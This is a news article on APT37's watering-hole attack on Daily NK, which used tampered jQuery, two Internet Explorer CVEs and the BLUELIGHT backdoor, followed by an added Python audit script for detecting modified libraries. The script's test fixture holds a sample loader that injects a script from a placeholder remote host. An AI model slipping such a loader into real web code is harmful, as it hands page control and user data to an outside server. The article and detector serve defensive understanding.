NK Hackers Deploy Browser Exploits on South Korean Sites to Spread Malware


A North Korean threat actor has been discovered taking advantage of two exploits in Internet Explorer to infect victims with a custom implant as part of a strategic web compromise (SWC) targeting a South Korean online newspaper.

Cybersecurity firm Volexity attributed the watering hole attacks to a threat actor it tracks as InkySquid, which is more widely known by the monikers ScarCruft and APT37. Daily NK, the publication in question, is said to have hosted the malicious code from at least late March 2021 until early June 2021.

The “clever disguise of exploit code amongst legitimate code” and the use of custom malware enable the attackers to avoid detection, Volexity researchers said.

The attacks involved tampering with the jQuery JavaScript libraries hosted on the website to serve additional obfuscated JavaScript code from a remote URL, using it to leverage exploits for two Internet Explorer flaws that were patched by Microsoft in August 2020 and March 2021. Successful exploitation resulted in the deployment of a Cobalt Strike stager and a novel backdoor called BLUELIGHT.

  • CVE-2020-1380 (CVSS score: 7.5) – Scripting Engine Memory Corruption Vulnerability
  • CVE-2021-26411 (CVSS score: 8.8) – Internet Explorer Memory Corruption Vulnerability

It’s worth noting that both flaws have been actively exploited in the wild, with the latter put to use by North Korean hackers to compromise security researchers working on vulnerability research and development in a campaign that came to light earlier this January.

In a separate set of attacks disclosed last month, an unidentified threat actor was found exploiting the same flaw to deliver a fully-featured VBA-based remote access trojan (RAT) on compromised Windows systems.

BLUELIGHT is used as a secondary payload following the successful delivery of Cobalt Strike, functioning as a full-featured remote access tool that provides complete access to a compromised system.

In addition to gathering system metadata and information about installed antivirus products, the malware is capable of executing shellcode, harvesting cookies and passwords from Internet Explorer, Microsoft Edge, and Google Chrome browsers, collecting files and downloading arbitrary executables, the results of which are exfiltrated to a remote server.

“While SWCs are not as popular as they once were, they continue to be a weapon in the arsenal of many attackers,” the researchers noted. “The use of recently patched exploits for Internet Explorer and Microsoft Edge will only work against a limited audience.”
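Because the compromise described above hid inside self-hosted jQuery files, a site operator can catch it by comparing each served library against a pinned copy of the upstream release. The following is an added example, not code from Volexity or the original article; the sample file contents, the `example.invalid` host and the function names are constructed for illustration.

```python
import base64
import hashlib
import re

# Constructed sample: stand-in for the library exactly as released upstream.
KNOWN_GOOD = (
    b"/*! jQuery (constructed sample) | https://jquery.org/license */\n"
    b"(function(w){w.jQuery=function(s){"
    b"return w.document.querySelectorAll(s);};})(window);\n"
)

# Constructed sample: the same file with a loader appended that pulls a
# script from a remote URL (placeholder host, not an indicator from the report).
TAMPERED = KNOWN_GOOD + (
    b'(function(){var s=document.createElement("script");'
    b's.src="https://cdn.example.invalid/x.js";'
    b"document.head.appendChild(s);})();\n"
)

# Matches the host part of absolute and protocol-relative URLs.
URL_RE = re.compile(rb"(?:https?:)?//([A-Za-z0-9.-]+\.[A-Za-z]{2,})")


def sri_digest(data: bytes) -> str:
    """Return the Subresource Integrity value (sha384-<base64>) for data."""
    return "sha384-" + base64.b64encode(hashlib.sha384(data).digest()).decode()


def remote_hosts(data: bytes) -> set:
    """Hosts referenced in plain text inside the file."""
    return {m.group(1).decode().lower() for m in URL_RE.finditer(data)}


def audit(served: bytes, baseline: bytes) -> dict:
    """Compare the served library with the pinned baseline.

    The digest is the authoritative check. The host diff is only a triage
    hint: an obfuscated loader may hide its URL, leaving new_hosts empty
    while digest_ok is still False.
    """
    return {
        "digest_ok": sri_digest(served) == sri_digest(baseline),
        "new_hosts": sorted(remote_hosts(served) - remote_hosts(baseline)),
        "extra_bytes": len(served) - len(baseline),
    }


if __name__ == "__main__":
    print(audit(TAMPERED, KNOWN_GOOD))
```

Run on a schedule against every script the site serves, with baselines taken from the upstream release rather than from the web server itself, so a modified file cannot become its own reference.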